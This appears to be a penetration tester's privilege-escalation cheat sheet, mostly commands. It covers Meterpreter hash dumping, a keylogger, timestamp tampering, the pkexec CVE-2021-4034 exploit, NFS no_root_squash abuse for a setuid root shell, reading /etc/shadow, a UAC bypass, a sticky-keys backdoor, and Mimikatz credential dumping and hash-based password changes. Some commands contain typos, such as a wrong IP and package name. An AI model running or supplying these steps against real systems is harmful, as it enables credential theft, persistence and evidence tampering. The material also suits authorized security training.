Privilege Escalation

Tools

After you have a meterpreter session, use the following command to check the user.

getuid

BeRoot

We can use BeRoot tool to check for further attack vectors.

GitHub - AlessandroZ/BeRoot: Privilege Escalation Project - Windows / Linux / MacGitHub

uploading with meterpreter. Files go to downloads folder by default

upload beroot.exe

Now run shell and then execute the file. It will list the attack vectors.

Note: Windows privileges can be used to escalated privileges. These privileges include SeDebug, SeRestore & SeBackup & SeTakeOwnership, SeTcb & SeCreateToken, SeLoadDriver, and Selmpersonate & SeAssignPrimaryToken. BeRoot lists all available privileges and highlights if you have one of these tokens.

Ghostpack Seatbelt

GitHub - GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.GitHub

Gather information with following commands

Seatbelt.exe -group=all -full
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=misc

Dumping hashes in meterpreter

hashdump   // or try the following
use post/windows/gather/smart_hashdump

Post exploitation using Meterpreter

Metasploit Unleashed | MSF Post Exploitation | OffSecOffSec

Useful commands

sysinfo
getuid
ifconfig
pwd \\(mostly downloads folder)
ls
cat
cd
keyscan_start //keylogger
keyscan-dump
idletime

To modify the timestamp MACE (modified, accessed,created,entry) attributes

timestomp secret.ext -m "2/11/2022 8:10:03"

To view timestamp entries

timestomp secret.ext -v

-a accessed

-c created

-e entry modified

Finding files in meterpreter

search -f flag*.txt (in meterpreter)

Hidden files in shell

First get the shell, then use the following command.

dir /a:h

List all running services in shell

sc querytex type=service state=all

Other shell commands

netsh firewall show state \\firewall state
netsh firewall show config
wmic cpu get 
wmic /node:"" product get name,version,vendor
wmic useraccount get name,sid
wmic os where Primary='TRUE' reboot //restarts system

pkexec: Linux

CVE (2021-4034)

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).

GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1dayGitHub

PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) | Qualys Security BlogQualys Security Blog

Download and run the script.

NFS Misconfiguration

Linux Privilege Escalation using Misconfigured NFS - Hacking ArticlesHacking Articles

An excellent Tutorial

Configure NFS in Victim

sudo apt install nfs-kernel-server

open /etc/exports file. This file contains the list of shares you want to share in the network. Add the following entry.

/home    *(rw,no_root_squash)

Home directory is shared and root user can perform read/write

restart the server

sudo /etc/init.d/nfs-kernel-server restart

If we run the nmap scan now, port 2049 will appear as open.

In Attacking Machine

Now install NFS commons

sudo apt install nfs-commons

check the mouted folder

showmount -e 192.168.18.110

Now mount the share

mkdir /tmp/nfs
sudo mount -t nfs 19.168.18.110:/home /tmp/nfs

Now move to the directory

cd /tmp/nfs
cp /bin/bash .
chmod +s bash   //allows the group to execute it
ls -la bash

to check free space

sudo df -h

Now ssh into the machine. Move to the shared directory and run bash and we will get the root shell.

cd /home
./bash -p

useful commands post exploitation

id
whoami
cat etc/cronjobs
find / -name *.txt -ls 2>/dev/null  to list all text files in system
route -n  host/network names in binary format

Now copy nano to current directory and then read shadow file

sudo cp /bin/nano .
./nano -p /etc/shadow

To see running processes

ps -ef

To view executable binaries

find / -perm -4000 *.txt -ls 2>/dev/null

Bypassing UAC and sticky keys

After you have a meterpreter session background it and then use the following exploit

use exploit/windows/local/bypassuac_fodhelper

Then once you get a new meterpreter session, use the following command

getsystem -t 1

Using sticky keys to priv esc on Win 11

After the initial meterpreter session, use the following module.

use post/windows/manage/sticky_keys

Now set the already priv escalated session in options and exploit it.

Now on Windows 11 , sign in with a normal user and once you press the stick keys(shift 5 times), you will get cmd as admin.

Mimikatz

Metasploit for Pentester: Mimikatz - Hacking ArticlesHacking Articles

Metasploit has built in module for mimikatz call kiwi.

First get a meterpreter session. Escalate privilege using bypassuac.

In meterpreter load the module

load kiwi
help kiwi \\to see help

to dump hashes

lsa_dump_sam

We can also dump LSA Secrets using the following command. LSA secrets are used to manage local system security policy. it may contain passwords, IE passwords, SQL passwords etc

change the password with kiwi with hash without knowing the original password.

password_change -u raj -p 123 -P 9876
password_change -u raj -n <NTLM-hash> -P 1234